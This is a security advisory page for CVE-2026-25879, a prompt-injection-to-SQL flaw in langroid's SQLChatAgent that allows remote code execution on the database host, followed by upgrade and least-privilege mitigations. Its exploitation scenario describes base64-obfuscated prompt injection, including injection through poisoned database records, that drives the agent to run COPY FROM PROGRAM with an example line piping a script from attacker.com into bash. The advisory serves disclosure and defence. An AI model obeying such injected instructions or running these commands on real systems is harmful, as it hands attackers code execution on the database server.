CVE-2026-25879: langroid: Prompt-to-SQL injection enables RCE on DB host
GHSA-mxfr-6hcw-j9rq CRITICAL CISA: ATTENDLangroid's SQLChatAgent passes LLM-generated SQL directly to the configured database without any validation, allowing an attacker to coerce execution of database-native OS primitives (PostgreSQL COPY FROM PROGRAM, MySQL FILE, MSSQL xp_cmdshell) through crafted prompts or poisoned data returned to the LLM. The CVSS 9.8 score reflects network-accessible exploitation requiring zero authentication or user interaction, and a public PoC demonstrating full RCE via base64-obfuscated prompt injection is already available. Any deployment where the database role holds elevated privileges — common in developer and staging environments, and in any non-minimal production PostgreSQL setup — is fully compromised once an attacker can shape agent input, including indirectly via database records. Upgrade to langroid 0.63.0 immediately; if patching is blocked, restrict the database role to SELECT-only and revoke pg_execute_server_program, FILE, or xp_cmdshell privileges from all AI agent database accounts.
What is the risk?
Critically high. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) with a working public PoC and no remediation complexity beyond upgrading the package. The attack surface is any internet-facing or multi-tenant application using langroid SQLChatAgent, particularly where default or developer database roles retain OS-level execution privileges. The indirect injection vector — triggering exploitation via data already in the database or documents fed to the agent — significantly expands the realistic attacker surface beyond direct-user exploitation. EPSS data is not yet available (CVE published 2026-05-27), but the combination of critical severity, public PoC, no-auth vector, and novel AI-specific attack chain warrants treating exploitation likelihood as near-certain for exposed deployments.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Langroid | pip | < 0.63.0 | 0.63.0 |
Do you use Langroid? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
Upgrade langroid to 0.63.0 immediately — this release defaults SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with dialect-aware dangerous-pattern blocking.
-
Audit all langroid deployments for allow_dangerous_operations=True in SQLChatAgentConfig; this flag restores the vulnerable behavior and must only be set for fully isolated, trusted-internal deployments.
-
If immediate patching is blocked: revoke pg_execute_server_program from the application database role in PostgreSQL; for MySQL revoke FILE privilege; for MSSQL disable xp_cmdshell via sp_configure.
-
Enforce principle of least privilege for all AI agent database accounts — SELECT-only roles for read-only agents, no DDL, no COPY, no EXECUTE privileges.
-
Add database audit logging rules to alert on COPY FROM PROGRAM, CREATE FUNCTION, LOAD DATA INFILE, or xp_cmdshell execution by AI agent service accounts.
-
For indirect injection exposure, review all data sources fed to the agent for potential prompt injection content before ingestion.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-25879?
Langroid's SQLChatAgent passes LLM-generated SQL directly to the configured database without any validation, allowing an attacker to coerce execution of database-native OS primitives (PostgreSQL COPY FROM PROGRAM, MySQL FILE, MSSQL xp_cmdshell) through crafted prompts or poisoned data returned to the LLM. The CVSS 9.8 score reflects network-accessible exploitation requiring zero authentication or user interaction, and a public PoC demonstrating full RCE via base64-obfuscated prompt injection is already available. Any deployment where the database role holds elevated privileges — common in developer and staging environments, and in any non-minimal production PostgreSQL setup — is fully compromised once an attacker can shape agent input, including indirectly via database records. Upgrade to langroid 0.63.0 immediately; if patching is blocked, restrict the database role to SELECT-only and revoke pg_execute_server_program, FILE, or xp_cmdshell privileges from all AI agent database accounts.
Is CVE-2026-25879 actively exploited?
No confirmed active exploitation of CVE-2026-25879 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-25879?
1. Upgrade langroid to 0.63.0 immediately — this release defaults SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with dialect-aware dangerous-pattern blocking. 2. Audit all langroid deployments for allow_dangerous_operations=True in SQLChatAgentConfig; this flag restores the vulnerable behavior and must only be set for fully isolated, trusted-internal deployments. 3. If immediate patching is blocked: revoke pg_execute_server_program from the application database role in PostgreSQL; for MySQL revoke FILE privilege; for MSSQL disable xp_cmdshell via sp_configure. 4. Enforce principle of least privilege for all AI agent database accounts — SELECT-only roles for read-only agents, no DDL, no COPY, no EXECUTE privileges. 5. Add database audit logging rules to alert on COPY FROM PROGRAM, CREATE FUNCTION, LOAD DATA INFILE, or xp_cmdshell execution by AI agent service accounts. 6. For indirect injection exposure, review all data sources fed to the agent for potential prompt injection content before ingestion.
What systems are affected by CVE-2026-25879?
This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, Text-to-SQL pipelines, Conversational database interfaces, RAG pipelines with database backends.
What is the CVSS score for CVE-2026-25879?
CVE-2026-25879 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.41%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0050 Command and Scripting Interpreter AML.T0051.000 Direct AML.T0051.001 Indirect AML.T0053 AI Agent Tool Invocation AML.T0068 LLM Prompt Obfuscation AML.T0102 Generate Malicious Commands Compliance Controls Affected
What are the technical details?
Original Advisory
Langroid is a framework for building large-language-model-powered applications. Prior to version 0.63.0, SQLChatAgent executes SQL produced by an LLM, which is influenceable by prompt injection. When configured with a database role that has privileges enabling code execution or filesystem access (e.g., PostgreSQL pg_execute_server_program, MySQL FILE, MSSQL xp_cmdshell), an attacker who can shape the agent's input — including indirectly via data returned to the LLM — can coerce execution of dialect-specific primitives such as `COPY ... FROM PROGRAM`, achieving RCE on the database host. Fixed in v0.63.0 by defaulting SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with a dialect-aware dangerous-pattern blocklist; allow_dangerous_operations=True restores the previous unrestricted behavior for trusted deployments.
Exploitation Scenario
An attacker submits a query to a langroid-powered text-to-SQL assistant (or embeds malicious instructions in a database record or document the agent will process). The injected prompt instructs the LLM to decode a base64-encoded SQL payload during its reasoning phase — bypassing naive prompt-injection filters — then populate the RunQueryTool action with the decoded SQL. Because SQLChatAgent passes LLM-generated queries to the database without validation, the malicious SQL executes: a temporary table is created, COPY FROM PROGRAM executes an OS command (e.g., id, curl attacker.com/shell.sh | bash), and results are returned via SELECT. The entire chain — from crafted prompt to RCE — requires no credentials beyond database user-level access to OS execution primitives, which are present in many default and development configurations.
Weaknesses (CWE)
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Primary
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') CWE-94 Improper Control of Generation of Code ('Code Injection') CWE-89 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
- [Architecture and Design] If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-54769 10.0 Langroid: prompt injection to RCE via broken eval() sandbox
Same package: langroid CVE-2026-54771 8.1 Langroid: auth bypass invokes disabled tools via raw JSON
Same package: langroid CVE-2026-50181 7.1 Langroid: path traversal escapes sandboxed file tools
Same package: langroid CVE-2026-55615 Langroid: unvalidated LLM Cypher enables graph RCE
Same package: langroid CVE-2026-50180 langroid: SQL blocklist bypass leaks Postgres files
Same package: langroid